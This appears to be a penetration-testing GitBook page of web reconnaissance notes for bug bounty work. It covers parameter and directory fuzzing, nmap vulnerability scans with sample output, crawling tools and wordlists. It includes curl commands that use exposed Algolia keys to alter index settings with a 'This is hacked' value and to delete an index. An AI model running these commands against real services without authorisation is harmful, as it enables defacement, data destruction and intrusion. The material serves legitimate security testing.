Retrieve/read the data of a resource from the server:

• settings

curl --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header 'content-type: application/json' --header 'x-algolia-api-key: <example-key>' --header 'x-algolia-application-id: <example-application-id>'

• Specific index

curl -X GET \
  "https://{appID}-dsn.algolia.net/1/indexes/{index_name}" \
  -H "X-Algolia-API-Key: {apikey}" \
  -H "X-Algolia-Application-Id: {appID}"

Update a resource on the server.

curl -X PATCH --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header 'content-type: application/json' --header 'x-algolia-api-key: <example-key>' --header 'x-algolia-application-id: <example-application-id>' --data '{"highlightPreTag": "This is hacked"}'

Delete Index - DON'T DO THIS ON PRODUCTION ENVIRONMENT

curl -X DELETE \
  "https://{appID}-dsn.algolia.net/1/indexes/Index_name?x-algolia-application-id={appID}&x-algolia-api-key={apiKey}"

Hidden Parameter

This useful option in Burp Suite makes every hidden input field (often with a reference to a hidden parameter) visible

Proxy Settings >>> Response modification rules >>> Unhide hidden form fields

Parameters fuzzing

Burp - Param Miner

right-click, extension>Param Miner> Guess params> Guess GET parameters.

Burp - GAP

GetAllParams

GitHub - xnl-h4ck3r/GAP-Burp-Extension: Burp Extension to find potential endpoints, parameters, and generate a custom target wordlistGitHub

x8

Hidden parameters discovery

GitHub - Sh1Yo/x8: Hidden parameters discovery suiteGitHub

Arjun

GitHub - s0md3v/Arjun: HTTP parameter discovery suite.GitHub

Hacker tools: Arjun – The parameter discovery toolIntigriti

$ python3 /opt/Arjun/arjun.py -u http://target_address.com

$ python3 /opt/Arjun/arjun.py -u http://target_address.com -o arjun_results.json

If you’ve been proxying traffic with Burp Suite, you can select all URLs within the sitemap, use the Copy Selected URLs option, and paste that list to a text file. Then run Arjun against all Burp Suite targets simultaneously, like this:

$ python3 /opt/Arjun/arjun.py -i burp_targets.txt

Parmahunter

GitHub - nullenc0de/paramhunter: Looks for parameters in urlsGitHub

Wordlists

Try /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt first, then https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/fuzz.txt

Fuzzing

fuzz.txt/fuzz.txt at master · Bo0oM/fuzz.txtGitHub

GitHub - p0dalirius/webapp-wordlists: This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.GitHub

GitHub - Karanxa/Bug-Bounty-Wordlists: A repository that includes all the important wordlists used while bug hunting.GitHub

• dirb lists

• https://wordlists.assetnote.io/

• SecList: https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content

• BugBounty All Fuzz: https://raw.githubusercontent.com/Karanxa/Bug-Bounty-Wordlists/refs/heads/main/all_fuzz.txt

• Common extensions: raft-[ small | medium | large ]-extensions.txt from SecList Web-Content

• Create wordlist - CeWL

cewl -m5 --lowercase -w wordlist.txt http://192.168.10.10

Fuzz using different HTTP methods

ffuf -u https://api.example.com/PATH -X METHOD -w /path/to/wordlist:PATH -w /path/to/http_methods:METHOD

Admin interfaces

Bug-Bounty-Wordlists/admin.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Backups

Bug-Bounty-Wordlists/backup_files_only.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Bug-Bounty-Wordlists/backup_files_with_path.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Config files

Bug-Bounty-Wordlists/config.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Bug-Bounty-Wordlists/webconfig.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Bug-Bounty-Wordlists/git_config.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

SQL files

Bug-Bounty-Wordlists/sql.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Vulnerability Assessment

Vulnerability ScannersPort Scan

sudo nmap 10.129.2.28 -p 80 -sV --script vuln 

Nmap scan report for 10.129.2.28
Host is up (0.036s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2
|   /: WordPress version: 5.3.4
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners:
|   cpe:/a:apache:http_server:2.4.29:
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715

GitHub - scmanjarrez/CVEScannerV2: Nmap script that scans for probable vulnerabilities based on services discovered in open ports.GitHub

GitHub - vulnersCom/nmap-vulners: NSE script based on Vulners.com APIGitHub

Lostfuzzer

GitHub - coffinxp/lostfuzzer: A Bash script for automated nuclei dast scanning by using passive urlsGitHub

Admin interface

Password lists

CMS

GitHub - Tuhinshubhra/CMSeeK: CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSsGitHub

CMS

Crawling

Crawl with 2 separate user-agent

Always crawl with 2 separate user-agent headers, one for desktop and one for mobile devices and look for response changes!

gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X..." -o mobile_endpoints.txt

Gospider

GitHub - jaeles-project/gospider: Gospider - Fast web spider written in GoGitHub

GoSpider - Hacker Tools: Enumerate the web! 👩‍💻Intigriti

Hakrawler

GitHub - hakluke/hakrawler: Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web applicationGitHub

With Burp

Running a full crawl and audit - PortSwiggerBurp_Suite

With Zap

The ZAP HomepageZAP

sudo snap install zaproxy --classic

• Spidering

• Fuzzing

Fuzz

Wordlists

Fuzzing

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS

Admin interface=> Password guessing

CMS

Banner grabbing

curl -IL https://www.inlanefreight.com

Tool: https://github.com/FortyNorthSecurity/EyeWitness ; or Aquatone

Information Gathering

whatweb 10.10.10.121
whatweb --no-errors 10.10.10.0/24

DNS Subdomain Enumeration

DNS Subdomain Enumeration

Cloudflare Bypass for Web Scraping

GitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscrapingGitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.